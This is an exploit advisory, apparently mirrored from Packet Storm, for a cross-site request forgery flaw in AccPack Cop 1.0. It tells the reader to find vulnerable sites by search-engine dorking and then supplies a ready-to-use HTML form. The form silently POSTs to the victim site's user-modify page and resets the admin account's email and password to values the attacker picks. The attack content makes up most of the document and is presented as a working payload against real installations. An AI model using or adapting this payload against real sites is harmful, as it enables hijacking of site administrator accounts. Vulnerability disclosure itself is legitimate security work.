AccPack Cop 1.0 Cross Site Request Forgery

AccPack Cop 1.0 Cross Site Request Forgery
2024-8-2 21:32:37 Author: packetstormsecurity.com(查看原文) 阅读量:0 收藏

=============================================================================================================================================
| # Title     : AccPack Cop v1.0 CSRF Vulnerability                                                                                         |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            |
| # Vendor    : http://webpay.com.np/#Product                                                                                               |
=============================================================================================================================================poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following HTML code modifies the admin information.
[+] Go to the line 5. Set the target site link Save changes and apply . 
[+] infected file : cms/user/modify.php.
[+] http://127.0.0.1/q7.3/cms/user/modify.php.
[+] save code as poc.html 
[+] payload : 
</head>
<body>
  <div class="container">
    <div class="text-center" style="padding: 5px"><h3>User Edit</h3></div>
    <form action="https://tssclahanorgnp/cms/user/modify.php" method="POST"  enctype="multipart/form-data">
      <div hidden="true">
        <input type="text" name="id" id="id" value="1">
      </div>
       <div>
        <label for='email'>Email</label><input  type="text" class="form-control" name='email' id='email' value="[email protected]">
       </div>
       <div>
        <label for='password'>Password</label><input  type="text" class="form-control" name='password' id='password' type='password' value="123456">
       </div>
       <tr>
       <div>
        <label for='status'>Status</label>
          <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>
          <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>
               </div>   
       <div style='height:80'>
        <input type='submit' value='Submit'><input type='reset' Value='Reset'>
       </div>
    </form>
  </div>
</body>
</html>
Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

文章来源: https://packetstormsecurity.com/files/179871/accpackcop10-xsrf.txt
如有侵权请联系:admin#unsafe.sh